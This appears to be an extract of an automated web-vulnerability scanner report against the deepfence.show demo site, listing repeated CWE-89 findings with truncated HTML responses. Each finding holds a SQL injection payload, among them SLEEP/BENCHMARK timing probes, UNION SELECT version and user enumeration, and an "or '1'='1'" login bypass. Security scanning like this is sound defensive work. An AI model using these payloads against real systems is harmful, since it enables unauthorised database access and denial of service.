href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #644\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A\n')),4,5,6,7,8,9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #645\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #646\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #647\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #648\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #649\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io or benchmark(50000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #650Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #651\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io '%20o/**/r%201/0%20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #652\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #653\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #654\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),3--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #655\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin') or '1'='1'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #656\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARKdeepfence.io (1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #657\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 